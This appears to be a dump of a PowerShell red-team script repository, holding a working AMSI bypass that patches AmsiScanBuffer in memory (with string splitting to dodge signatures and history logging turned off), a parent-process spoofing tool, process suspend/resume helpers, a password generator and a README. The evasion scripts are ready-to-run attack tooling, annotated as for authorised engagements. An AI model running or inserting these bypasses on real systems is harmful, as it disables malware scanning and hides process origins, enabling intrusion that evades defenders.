├── Disable-AMSI.ps1 ├── Invoke-Profiler.ps1 ├── Invoke-Rubeus.ps1 ├── Invoke-SharpHound.ps1 ├── LICENSE ├── New-Password.ps1 ├── ProcessReParent.ps1 ├── ProcessSuspendResume.ps1 └── README.md
/Disable-AMSI.ps1:
--------------------------------------------------------------------------------
# Patches AmsiScanBuffer in the copy of amsi.dll loaded into *this* PowerShell
# process so every scan request fails immediately; nothing outside the current
# process is affected. Review notes (code left unchanged):
#   * The page is made PAGE_EXECUTE_READWRITE and the previous protection is
#     never restored, so it stays RWX - a memory artefact scanners look for.
#   * VirtualProtect is asked for 5 bytes but Marshal.Copy writes 6; this only
#     works because protection changes are applied at page granularity.
#   * Neither VirtualProtect's return value nor a null LoadLibrary/GetProcAddress
#     result is checked, so a failed patch is silent.
#   * Use only within the scope of an authorised engagement.
function Disable-AMSI
{
    # Stop PSReadLine from persisting this session's command lines to its
    # history file. This is session-wide, not limited to this function.
    Set-PSReadlineOption -HistorySaveStyle SaveNothing

    # Minimal P/Invoke surface: resolve the export, make it writable, patch it.
    $AMSIBypass=@"
using System;
using System.Runtime.InteropServices;

public class foo {

    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);

    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

}
"@

    Add-Type $AMSIBypass

    # The literals "amsi.dll" / "AmsiScanBuffer" are split - presumably so the
    # script text itself is not matched by a simple signature.
    $l = [foo]::LoadLibrary("am" + "si.dll")
    $a = [foo]::GetProcAddress($l, "Amsi" + "Scan" + "Buffer")
    $p = 0
    # 0x40 = PAGE_EXECUTE_READWRITE. The old protection lands in $p and is never
    # written back; the boolean result is discarded.
    $null = [foo]::VirtualProtect($a, [uint32]5, 0x40, [ref]$p)
    # B8 57 00 07 80 C3 decodes to `mov eax, 0x80070057 ; ret`, i.e. the
    # function returns E_INVALIDARG at once without scanning the buffer.
    $pa = [Byte[]] (184, 87, 0, 7, 128, 195)
    [System.Runtime.InteropServices.Marshal]::Copy($pa, 0, $a, 6)

}
--------------------------------------------------------------------------------
/Invoke-Profiler.ps1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cfalta/PoshRandom/aadf5aa791046c62d557e946526d5530dba8ffd4/Invoke-Profiler.ps1
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
BSD 3-Clause License

Copyright (c) 2019, Christoph Falta
All rights reserved.

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:

1.
Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
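--------------------------------------------------------------------------------
/New-Password.ps1:
--------------------------------------------------------------------------------
function New-Password([int]$Length)
{
    <#
    .SYNOPSIS
    Generates a random password of $Length characters drawn from a fixed
    70-character alphabet (digits, :;<=>?!, A-Z, _, a-z).

    .NOTES
    Draws randomness from System.Security.Cryptography.RandomNumberGenerator
    instead of Get-Random, which is a general-purpose PRNG and not suitable for
    secrets. Characters are chosen by rejection sampling so every alphabet
    entry is equally likely (256 mod 70 != 0, so a plain modulo would favour
    the first 46 characters).

    Returns nothing for a non-positive $Length, as before.
    #>
    if($Length -le 0)
    {
        return
    }

    $Alphabet = [char[]]"0123456789:;<=>?!ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
    # Largest multiple of the alphabet size that fits in one byte (3 * 70 = 210);
    # byte values at or above it are discarded.
    $Limit = [int][math]::Floor(256 / $Alphabet.Length) * $Alphabet.Length

    $Rng = [System.Security.Cryptography.RandomNumberGenerator]::Create()
    try
    {
        $Chars = New-Object char[] $Length
        $Byte = New-Object byte[] 1
        for($i = 0; $i -lt $Length; $i++)
        {
            do { $Rng.GetBytes($Byte) } while($Byte[0] -ge $Limit)
            $Chars[$i] = $Alphabet[$Byte[0] % $Alphabet.Length]
        }
        return (-join $Chars)
    }
    finally
    {
        $Rng.Dispose()
    }
}
--------------------------------------------------------------------------------
/ProcessReParent.ps1:
--------------------------------------------------------------------------------
#.NET stub shamelessly copied from the great rasta-mouse https://gist.github.com/rasta-mouse/af009f49229c856dc26e3a243db185ec
#
# Parent-process (PPID) spoofing through PROC_THREAD_ATTRIBUTE_PARENT_PROCESS:
# the new process is created with an arbitrary existing process recorded as
# its parent. Changes from the original stub:
#   * every native call is checked and a failure throws Win32Exception instead
#     of being swallowed (the original printed a stack trace, then "0 started");
#   * the parent is opened with PROCESS_CREATE_PROCESS only - the one right the
#     attribute needs - rather than borrowing System.Diagnostics.Process.Handle;
#   * hProcess/hThread from PROCESS_INFORMATION, the parent handle and the
#     attribute buffer are always released (lpValue used to be allocated twice
#     and the first allocation leaked).
Add-Type -TypeDefinition @"
using System;
using System.ComponentModel;
using System.Runtime.InteropServices;

public class ProcessReparent
{
    /// <summary>
    /// Starts ProcPath with the process identified by ProcID recorded as its parent.
    /// Prints "&lt;pid&gt; started" on success; throws Win32Exception when any of the
    /// underlying API calls fails.
    /// </summary>
    public static void Start(string ProcPath, int ProcID)
    {
        var startInfoEx = new Win32.STARTUPINFOEX();
        var processInfo = new Win32.PROCESS_INFORMATION();
        startInfoEx.StartupInfo.cb = (uint)Marshal.SizeOf(startInfoEx);

        var lpValue = IntPtr.Zero;
        var parentHandle = IntPtr.Zero;

        try
        {
            var processSecurity = new Win32.SECURITY_ATTRIBUTES();
            var threadSecurity = new Win32.SECURITY_ATTRIBUTES();
            processSecurity.nLength = Marshal.SizeOf(processSecurity);
            threadSecurity.nLength = Marshal.SizeOf(threadSecurity);

            // The first call is expected to fail (ERROR_INSUFFICIENT_BUFFER); it only
            // reports how much memory a list holding one attribute needs.
            var lpSize = IntPtr.Zero;
            Win32.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);
            startInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
            if (!Win32.InitializeProcThreadAttributeList(startInfoEx.lpAttributeList, 1, 0, ref lpSize))
            {
                throw new Win32Exception(Marshal.GetLastWin32Error());
            }

            // PROC_THREAD_ATTRIBUTE_PARENT_PROCESS requires PROCESS_CREATE_PROCESS on
            // the parent handle and nothing more (least privilege).
            parentHandle = Win32.OpenProcess(Win32.PROCESS_CREATE_PROCESS, false, ProcID);
            if (parentHandle == IntPtr.Zero)
            {
                throw new Win32Exception(Marshal.GetLastWin32Error());
            }

            lpValue = Marshal.AllocHGlobal(IntPtr.Size);
            Marshal.WriteIntPtr(lpValue, parentHandle);

            if (!Win32.UpdateProcThreadAttribute(
                startInfoEx.lpAttributeList,
                0,
                (IntPtr)Win32.ProcThreadAttribute.PARENT_PROCESS,
                lpValue,
                (IntPtr)IntPtr.Size,
                IntPtr.Zero,
                IntPtr.Zero))
            {
                throw new Win32Exception(Marshal.GetLastWin32Error());
            }

            if (!Win32.CreateProcess(
                ProcPath,
                null,
                ref processSecurity,
                ref threadSecurity,
                false,
                Win32.CreationFlags.ExtendedStartupInfoPresent,
                IntPtr.Zero,
                null,
                ref startInfoEx,
                out processInfo))
            {
                throw new Win32Exception(Marshal.GetLastWin32Error());
            }

            Console.WriteLine("{0} started", processInfo.dwProcessId);
        }
        finally
        {
            // Closing our handles does not affect the child; it keeps running.
            if (processInfo.hThread != IntPtr.Zero) Win32.CloseHandle(processInfo.hThread);
            if (processInfo.hProcess != IntPtr.Zero) Win32.CloseHandle(processInfo.hProcess);
            if (parentHandle != IntPtr.Zero) Win32.CloseHandle(parentHandle);
            if (startInfoEx.lpAttributeList != IntPtr.Zero)
            {
                Win32.DeleteProcThreadAttributeList(startInfoEx.lpAttributeList);
                Marshal.FreeHGlobal(startInfoEx.lpAttributeList);
            }
            if (lpValue != IntPtr.Zero) Marshal.FreeHGlobal(lpValue);
        }
    }
}

class Win32
{
    // Only access right needed on the parent for PROC_THREAD_ATTRIBUTE_PARENT_PROCESS.
    public const uint PROCESS_CREATE_PROCESS = 0x0080;

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool InitializeProcThreadAttributeList(IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool UpdateProcThreadAttribute(IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue, IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);

    // Unicode so non-ASCII paths resolve; SetLastError so failures can be reported.
    [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    public static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, CreationFlags dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);

    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION
    {
        public IntPtr hProcess;
        public IntPtr hThread;
        public int dwProcessId;
        public int dwThreadId;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFO
    {
        public uint cb;
        public IntPtr lpReserved;
        public IntPtr lpDesktop;
        public IntPtr lpTitle;
        public uint dwX;
        public uint dwY;
        public uint dwXSize;
        public uint dwYSize;
        public uint dwXCountChars;
        public uint dwYCountChars;
        public uint dwFillAttributes;
        public uint dwFlags;
        public ushort wShowWindow;
        public ushort cbReserved2;
        public IntPtr lpReserved2;
        public IntPtr hStdInput;
        public IntPtr hStdOutput;
        public IntPtr hStdErr;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct STARTUPINFOEX
    {
        public STARTUPINFO StartupInfo;
        public IntPtr lpAttributeList;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct SECURITY_ATTRIBUTES
    {
        public int nLength;
        public IntPtr lpSecurityDescriptor;
        public int bInheritHandle;
    }

    public enum ProcThreadAttribute : int
    {
        MITIGATION_POLICY = 0x20007,
        PARENT_PROCESS = 0x00020000
    }

    [Flags]
    public enum CreationFlags : uint
    {
        CreateSuspended = 0x00000004,
        DetachedProcess = 0x00000008,
        CreateNoWindow = 0x08000000,
        ExtendedStartupInfoPresent = 0x00080000
    }
}
"@

function Start-ProcessWithFakeParent {
    <#
    .SYNOPSIS
    Starts the executable at -Path with -ParentProcess (a PID or an image name)
    recorded as its parent process.

    .NOTES
    An image name matching more than one process is rejected; pass the PID
    instead. Native failures surface as Win32Exception from [ProcessReparent]::Start.
    #>
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true)]
        [ValidateScript({Test-Path $_})]
        [string]
        $Path,

        [Parameter(Mandatory=$true)]
        [ValidateNotNullorEmpty()]
        [Alias('ID')]
        [string]
        $ParentProcess
    )

    # A purely numeric value is a PID; anything else is treated as an image name.
    $ProcessID = 0
    if([int]::TryParse($ParentProcess, [ref]$ProcessID))
    {
        $Process = Get-Process -Id $ProcessID
    }
    else
    {
        $Process = Get-Process -Name $ParentProcess
    }

    if(-not $Process)
    {
        return
    }

    if($Process.Count -gt 1)
    {
        Write-Error "Possible parents count is greater than 1. Try to use process id instead of name."
        return
    }

    # CreateProcess gets lpApplicationName verbatim and does not use PowerShell's
    # $PWD, so a relative path validated by Test-Path must be made absolute first.
    $FullPath = (Resolve-Path -Path $Path).ProviderPath
    [ProcessReparent]::Start($FullPath, $Process.Id)
}
--------------------------------------------------------------------------------
/ProcessSuspendResume.ps1:
--------------------------------------------------------------------------------
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public static class ntdll
{
    // PreserveSig = false: a failing NTSTATUS is turned into a thrown exception
    // by the marshaller, so callers need no explicit status check.
    [DllImport("ntdll.dll", PreserveSig = false)]
    public static extern void NtSuspendProcess(IntPtr processHandle);
    [DllImport("ntdll.dll", PreserveSig = false)]
    public static extern void NtResumeProcess(IntPtr processHandle);
}
public static class kernel32
{
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr hObject);
}

[Flags]
public enum ProcessAccessFlags : uint
{
    All = 0x001F0FFF,
    Terminate = 0x00000001,
    CreateThread = 0x00000002,
    VirtualMemoryOperation = 0x00000008,
    VirtualMemoryRead = 0x00000010,
    VirtualMemoryWrite = 0x00000020,
    DuplicateHandle = 0x00000040,
    CreateProcess = 0x00000080,
    SetQuota = 0x00000100,
    SetInformation = 0x00000200,
    QueryInformation = 0x00000400,
    // PROCESS_SUSPEND_RESUME: all NtSuspendProcess/NtResumeProcess need.
    SuspendResume = 0x00000800,
    QueryLimitedInformation = 0x00001000,
    Synchronize = 0x00100000
}
"@

function Resolve-ProcessTarget
{
    # Accepts a numeric PID or an image name and returns the single matching
    # System.Diagnostics.Process. Writes an error and returns nothing when an
    # image name is ambiguous (same rule as Start-ProcessWithFakeParent).
    param([string]$Target)

    $ProcessID = 0
    if([int]::TryParse($Target, [ref]$ProcessID))
    {
        $Process = Get-Process -Id $ProcessID
    }
    else
    {
        $Process = Get-Process -Name $Target
    }

    if($Process -and $Process.Count -gt 1)
    {
        Write-Error "'$Target' matches more than one process. Use the process id instead of the name."
        return
    }

    return $Process
}

function Invoke-WithProcessHandle
{
    # Opens $Process with PROCESS_SUSPEND_RESUME only and runs $Action with the
    # handle, closing it afterwards even if $Action throws. The original asked
    # for PROCESS_ALL_ACCESS, which requests every right at once and is refused
    # as a whole when any single right is not granted.
    param([System.Diagnostics.Process]$Process, [scriptblock]$Action)

    $Handle = [kernel32]::OpenProcess([ProcessAccessFlags]::SuspendResume, $false, $Process.Id)
    if($Handle -eq [IntPtr]::Zero)
    {
        throw (New-Object System.ComponentModel.Win32Exception([System.Runtime.InteropServices.Marshal]::GetLastWin32Error()))
    }

    try
    {
        & $Action $Handle
    }
    finally
    {
        $null = [kernel32]::CloseHandle($Handle)
    }
}

function Suspend-Process {
    <#
    .SYNOPSIS
    Suspends every thread of a process, like Process Explorer's "Suspend".

    .PARAMETER Name
    Process id or image name. Accepts pipeline input (one call per value).
    #>
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true,ValueFromPipeline = $True)]
        [ValidateNotNullorEmpty()]
        [Alias('ID')]
        [string]
        $Name
    )

    # A process block is required for pipeline input; without one only the last
    # piped value was handled.
    process {
        $Process = Resolve-ProcessTarget -Target $Name
        if($Process)
        {
            Invoke-WithProcessHandle -Process $Process -Action { param($h) [ntdll]::NtSuspendProcess($h) }
        }
    }
}

function Resume-Process {
    <#
    .SYNOPSIS
    Resumes a process previously suspended with Suspend-Process.

    .PARAMETER Name
    Process id or image name. Accepts pipeline input (one call per value).
    #>
    [CmdletBinding()]
    param (
        [Parameter(Mandatory=$true,ValueFromPipeline = $True)]
        [ValidateNotNullorEmpty()]
        [Alias('ID')]
        [string]
        $Name
    )

    process {
        $Process = Resolve-ProcessTarget -Target $Name
        if($Process)
        {
            Invoke-WithProcessHandle -Process $Process -Action { param($h) [ntdll]::NtResumeProcess($h) }
        }
    }
}
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# PoshRandom

A not-at-all-ordered compilation of random security-related powershell scripts.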
Things land here if I don't know where else to put them ;-)

Here's a snapshot of what's in there at the moment:

* __Disable-AMSI:__ function to disable AMSI for the current PowerShell process only, by patching `AmsiScanBuffer` in the loaded amsi.dll in memory (a well-known technique; expect in-memory integrity checks to be able to flag it)
* __Invoke-Rubeus:__ PowerShell wrapper for GhostPack Rubeus by @harmj0y
* __Invoke-Profiler:__ an old AD recon tool. Probably doesn't work any more — work in progress
* __ProcessReparent:__ contains "Start-ProcessWithFakeParent", which starts a new process with an arbitrary existing process recorded as its parent (PPID spoofing via `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS`; you need `PROCESS_CREATE_PROCESS` access to the chosen parent). Shamelessly copied from the great rasta-mouse.
* __ProcessSuspendResume:__ allows you to invoke "Suspend-Process" and "Resume-Process" on a process id or image name (like Process Explorer does to suspend a process); they call `NtSuspendProcess`/`NtResumeProcess`
--------------------------------------------------------------------------------